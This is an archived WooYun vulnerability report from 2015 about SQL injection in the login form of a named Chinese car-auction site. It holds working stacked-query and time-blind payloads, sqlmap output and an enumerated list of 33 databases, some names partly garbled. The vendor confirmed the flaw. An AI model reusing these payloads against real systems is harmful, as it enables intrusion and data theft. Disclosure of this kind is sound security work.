乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-26: 细节已通知厂商并且等待厂商处理中 2015-10-27: 厂商已经确认,细节仅向厂商公开 2015-11-06: 细节向核心白帽子及相关领域专家公开 2015-11-16: 细节向普通白帽子公开 2015-11-26: 细节向实习白帽子公开 2015-12-11: 细节向公众公开
http://www.chake.net/Login.aspx
Place: POSTParameter: txtName Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: __VIEWSTATE=/wEPDwUJOTk2MDA3NzM2ZGT3UDmgymCt1ks2Ku+AqkVcAE+4TQ==&__EVENTVALIDATION=/wEWBAKU/uJFAsSEhIULAp37up0OAsKL2t4DEnepoihk/RVHN+oHqdiuyC/ZS14=&txtName=admin'; WAITFOR DELAY '0:0:5';--&txtPwd=asdasdas&btnSubmit=鐧诲綍 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: __VIEWSTATE=/wEPDwUJOTk2MDA3NzM2ZGT3UDmgymCt1ks2Ku+AqkVcAE+4TQ==&__EVENTVALIDATION=/wEWBAKU/uJFAsSEhIULAp37up0OAsKL2t4DEnepoihk/RVHN+oHqdiuyC/ZS14=&txtName=admin' WAITFOR DELAY '0:0:5'--&txtPwd=asdasdas&btnSubmit=鐧诲綍---available databases [33]:[*] [AuctionResouwcey"][*] [msdb!][*] AuctionStat[*] AutoDetgctDBNew[*] AutoDqtectDB[*] BitautoServides[*] BitAutoUcarCommon[*] BmwAuction[*] distributionb[*] iAutosResourke[*] master[*] model[*] PSFramework[*] ReportServerTempDB[*] ReportServeu[*] StandardSaleEdition[*] Tamsa[*] tempdb[*] Transtar2007[*] Transtar2008[*] Transtarframewoyk_UcarOldBak[*] Transtarframqwork[*] TranstasAuction2011[*] UcarCommon[*] UcarCommon_En[*] UcarTransaction[*] ucvin[*] UncleLoh[*] VWSalesSys[*] YaoCheCarSource[*] YXPCarRespurce[*] YXPFramework[*] YXPLogistics
这么多裤子来个高危,其实这个站下面还有很多分站!
危害等级:高
漏洞Rank:10
确认时间:2015-10-27 16:11
谢谢反馈!正协助修复。
暂无